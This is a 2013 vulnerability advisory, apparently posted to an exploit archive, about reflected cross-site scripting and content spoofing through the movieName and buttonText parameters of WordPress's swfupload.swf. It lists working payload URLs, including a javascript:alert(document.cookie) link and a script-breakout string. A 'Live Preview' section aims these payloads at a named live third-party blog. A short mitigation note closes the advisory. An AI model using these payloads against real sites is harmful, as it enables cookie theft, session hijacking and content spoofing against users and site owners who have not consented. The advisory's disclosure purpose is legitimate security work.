######################################################### # Title : Cross Site Scripting in RedTube Official Blog. # Author : Ryuzaki Lawlet # Blog : justryuz.blogspot.com / www.justryuz.com # E-mail : ryuzaki_l@y7mail.com / justryuz@facebook.com / justryuz@linuxmail.org # Date: June 6/2013 (4.44 pm) # Vendor: http://wordpress.org/plugins/nextgen-gallery/ # Type : Web Apps # Vector of operation: Remote # Impact: Cross Site Scripting & Content Spoofing # Tested on : Ubuntu / Window XP ########################################################## *Description: The vulnerability is caused due to insufficient input validation in the parameter “movieName†and "buttonText" in the script to swfupload.swf “ExternalInterface.call ()â€. This can be exploited to execute arbitrary HTML and script code in a user’s browser session in context of an affected site. There are two vulnerabilities in RedTube Official Blog. *Content Spoofing http://[victim]/Wordpress/wp-includes/js/swfupload/swfupload.swf?buttonText=test<img src='http://i.imgur.com/ltp2L8N.jpg'> It's possible to inject text, images and html (e.g. for link injection). *Cross-Site Scripting http://[victim]/Wordpress/wp-includes/js/swfupload/swfupload.swf?buttonText=<a href='javascript:alert(document.cookie)'>Click me</a> or http://[victim]/Wordpress/wp-includes/js/swfupload/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert("xss");// Code will execute after click. It's strictly social XSS. *Proof of Concept Code http://[victim]/Wordpress/wp-includes/js/swfupload/swfupload.swf?movieName=[XSS] http://[victim]/Wordpress/wp-includes/js/swfupload/swfupload.swf?buttonText=testbuttonText=test<img src='http://i.imgur.com/ltp2L8N.jpg'> *Live Preview http://blog.redtube.com/wp-includes/js/swfupload/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert("xss");// http://blog.redtube.com/wp-includes/js/swfupload/swfupload.swf?buttonText=<a href='javascript:alert(document.cookie)'>Click me</a> http://blog.redtube.com/wp-includes/js/swfupload/swfupload.swf?buttonText=test<img src='http://i.imgur.com/ltp2L8N.jpg'> *Screenshot https://fbcdn-sphotos-b-a.akamaihd.net/hphotos-ak-ash4/182547_425615577534257_1920413802_n.jpg *Solution: On the server side, you can upgrade to a non-vulnerable version. Onthe client you can use a browser that obeys the Content-Type header specified by the server, such as Mozilla Firefox, Google Chrome, Apple Safari or Opera. Internet Explorer 8 with the XSS Filter won't execute the malicious scripts. Reff: http://justryuz.blogspot.com/2013/05/title-cross-site-scripting-in-redtube.html